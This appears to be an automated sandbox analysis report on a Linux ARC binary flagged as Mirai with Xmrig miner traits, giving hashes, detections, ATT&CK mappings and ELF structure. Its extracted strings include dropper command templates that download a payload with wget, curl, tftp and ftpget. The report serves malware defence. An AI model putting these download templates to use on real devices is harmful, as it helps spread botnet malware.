Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
morte.arc.elf

Overview

General Information

Sample name:morte.arc.elf
Analysis ID:1729413
Has dependencies:false
MD5:cf40973b57fc3f9a4be3799ec8b4c57e
SHA1:f3aeeabaa88c8c098135d497cadcf3bde0558906
SHA256:99d4a218e00c9b5ecc791eb6d52fd6ab3e55927d2cb8ccd9d1efd105d8198704
Tags:elfuser-abuse_ch
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Mirai, Xmrig
Score:76
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Xmrig cryptocurrency miner
Found strings related to Crypto-Mining
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table

Classification

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1729413
Start date and time:2025-07-06 08:04:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:morte.arc.elf
Detection:MAL
Classification:mal76.troj.mine.linELF@0/0@0/0

Errors

  • No process behavior to analyse as no analysis process or sample was found

Runtime Messages

Command:/tmp/morte.arc.elf
PID:5523
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
XMRIGNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
morte.arc.elfJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    morte.arc.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: morte.arc.elfAvira: detected
      Multi AV Scanner detection for submitted file
      Source: morte.arc.elfVirustotal: Detection: 34%Perma Link
      Source: morte.arc.elfReversingLabs: Detection: 38%

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: morte.arc.elf, type: SAMPLE
      Found strings related to Crypto-Mining
      Source: morte.arc.elfString found in binary or memory: cryptonight
      Source: morte.arc.elfString: H^/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/data/local/tmp/var/mnt/root/boot/bin/sbin/home/dev
      Source: morte.arc.elfString: GFHICK"/var/run//mnt//root//var//var/tmp/arc%s%swget http://%s/%s/%s -O %scurl -o %s http://%s/%s/%stftp %s -c get %s %scd %s && tftp -g -r %s %sftpget -v -u anonymous -p anonymous -P 21 %s %s %s
      Source: Initial sampleString containing 'busybox' found: /usr/sbin/busybox
      Source: Initial sampleString containing 'busybox' found: /usr/bin/busybox
      Source: Initial sampleString containing 'busybox' found: H^/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/data/local/tmp/var/mnt/root/boot/bin/sbin/home/dev
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal76.troj.mine.linELF@0/0@0/0

      Stealing of Sensitive Information

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: morte.arc.elf, type: SAMPLE

      Remote Access Functionality

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: morte.arc.elf, type: SAMPLE

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid AccountsWindows Management Instrumentation1
      Scripting      		Path InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      morte.arc.elf34%VirustotalBrowse
      morte.arc.elf39%ReversingLabsLinux.Worm.Mirai
      morte.arc.elf100%AviraLINUX/Mirai.bonb

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      World Map of Contacted IPs

      No contacted IP infos

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):6.416032505550106
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:morte.arc.elf
      File size:124'644 bytes
      MD5:cf40973b57fc3f9a4be3799ec8b4c57e
      SHA1:f3aeeabaa88c8c098135d497cadcf3bde0558906
      SHA256:99d4a218e00c9b5ecc791eb6d52fd6ab3e55927d2cb8ccd9d1efd105d8198704
      SHA512:663b097fd02c054ec07bb057d2ffe2e13d27b2782d20b10abb79cb028505d449ececfbe3b226a9f4e20120b14f03e325a0c76a0723fe1c9fd7687e9ea95a11f6
      SSDEEP:3072:M3UVy9EaVDL2cNaHMxfukwOybXcRgxqC:MZvRwwf4fqC
      TLSH:5DC3AED7B78724A1C86247F007C74B9D2E63A201DE5BE9E76C0E663B197A0DF5A063C1
      File Content Preview:.ELF..............].........4...........4. ...(.................................. ..................<............ ..................................................................Q.td.......................................................................

      Static ELF Info

      ELF header

      Class:ELF32
      Data:2's complement, little endian
      Version:1 (current)
      Machine:<unknown>
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x106c0
      Flags:0x403
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:5
      Section Header Offset:124084
      Section Header Size:40
      Number of Section Headers:14
      Header String Table Index:13

      Sections

      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
      NULL0x00x00x00x00x0000
      .initPROGBITS0x101140x1140x220x00x6AX001
      .textPROGBITS0x101380x1380x13e080x00x6AX004
      .finiPROGBITS0x23f400x13f400x160x00x6AX001
      .rodataPROGBITS0x23f580x13f580x88b80x00x2A004
      .tbssNOBITS0x2ffe00x1dfe00x80x00x403WAT004
      .fini_arrayFINI_ARRAY0x2ffe00x1dfe00x40x40x3WA004
      .ctorsPROGBITS0x2ffe40x1dfe40x80x00x3WA004
      .dtorsPROGBITS0x2ffec0x1dfec0x80x00x3WA004
      .gotPROGBITS0x2fff40x1dff40x80x00x3WA004
      .dataPROGBITS0x300080x1e0080x4140x00x3WA004
      .bssNOBITS0x3041c0x1e41c0xbc500x00x3WA004
      .ARC.attributes<unknown>0x00x1e41c0x320x00x0001
      .shstrtabSTRTAB0x00x1e44e0x650x00x0001

      Program Segments

      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
      LOAD0x00x100000x100000x1c8100x1c8106.64870x5R E0x2000.init .text .fini .rodata
      LOAD0x1dfe00x2ffe00x2ffe00x43c0xc08c3.98100x6RW 0x2000.tbss .fini_array .ctors .dtors .got .data .bss
      NOTE0x00x00x00x00x00.00000x4R 0x4
      TLS0x1dfe00x2ffe00x2ffe00x00x80.00000x4R 0x4.tbss
      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

      Network Behavior

      No network behavior found

      System Behavior